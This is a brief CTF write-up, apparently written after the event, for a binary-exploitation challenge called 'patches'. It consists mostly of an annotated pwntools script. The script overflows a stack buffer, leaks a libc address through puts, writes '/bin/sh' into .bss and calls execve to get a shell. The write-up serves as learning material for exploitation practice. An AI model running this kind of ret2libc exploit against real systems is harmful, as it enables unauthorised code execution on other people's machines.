Tags: pwn ret2libc 

Rating:

Basic Ret2Libc

Note: I did not play this CTF; I just looked at the challenges after it was over.

```python
#!/usr/bin/python

from pwn import *

# pwntools context: Linux x86-64 target, full DEBUG logging of every send/recv,
# and a tmux window for the (commented-out) gdb.debug() alternative below.
context(os='linux',arch='amd64')
context.log_level = 'DEBUG'
context(terminal=['tmux','new-window'])

# Spawn the local binary; swap in the gdb.debug() line to break at main instead.
p = process('./patches')
#p = gdb.debug('./patches','b main')
# ELF views of the target and of the libc build it was shipped with (2.31 per filename).
e = ELF('./patches')
libc = ELF('./libc-2.31.so')

# Filler written before the ROP chain. 136 is presumably the distance from the
# overflowed buffer to the saved return address; how it was measured is not shown here.
# NOTE: this script is Python 2 only (str payloads, generator .next(), print statement).
JUNK = "A"*136

# Locate gadgets in the binary itself by searching for their encoded bytes.
# `.next()` is the Python 2 generator method; Python 3 would use next(...).
pop_rdi = e.search(asm('pop rdi; ret')).next()
pop_rsi = e.search(asm('pop rsi; pop r15; ret')).next()
gets = e.plt['gets']
plt_puts = e.plt['puts']
got_puts = e.got['puts']
# Scratch address inside the writable .bss section; the +1200 offset is not
# explained on the page — presumably just a spot clear of data the program uses.
bss = e.get_section_by_name('.bss')["sh_addr"] + 1200
main = e.symbols['main']

# Stage 1 chain:
#   gets(bss)        -> reads one line from stdin into the .bss scratch area
#   puts(got_puts)   -> prints the resolved address of puts (libc leak)
#   pop rsi; pop r15 -> both set to 0 (reason not stated; presumably to leave rsi clean)
#   main             -> re-run main so a second overflow is possible after the leak
payload = JUNK + p64(pop_rdi) + p64(bss) + p64(gets) + p64(pop_rdi) + p64(got_puts) + p64(plt_puts) + p64(pop_rsi) + p64(0) + p64(0) + p64(main)

p.recvuntil("> ")
p.sendline(payload)
# This line is what the gets(bss) call above consumes; sendline's trailing
# newline terminates gets, so the buffer holds the NUL-terminated string.
p.sendline("/bin/sh\x00")

# Leak is printed raw by puts (no newline inside, since the pointer has no 0x0a byte
# here); pad to 8 bytes before unpacking as a little-endian u64.
leak = u64(p.recvline().strip().ljust(8,'\x00'))
# libc base = leaked puts address - puts offset within this libc build.
libc.address = leak - libc.symbols['puts']
print hex(libc.address)  # Python 2 print statement

execve = libc.symbols['execve']

# Stage 2 chain: execve(bss, 0, 0).
# rdi -> the string gets() stored in .bss, rsi -> 0 (r15 also 0).
# rdx is never set by this chain; the call relies on whatever rdx holds at that point —
# confirm it is 0/NULL on the target, otherwise envp is garbage.
payload = JUNK + p64(pop_rdi) + p64(bss) + p64(pop_rsi) + p64(0) + p64(0) + p64(execve)

p.recvuntil("> ")
p.sendline(payload)

p.interactive()
```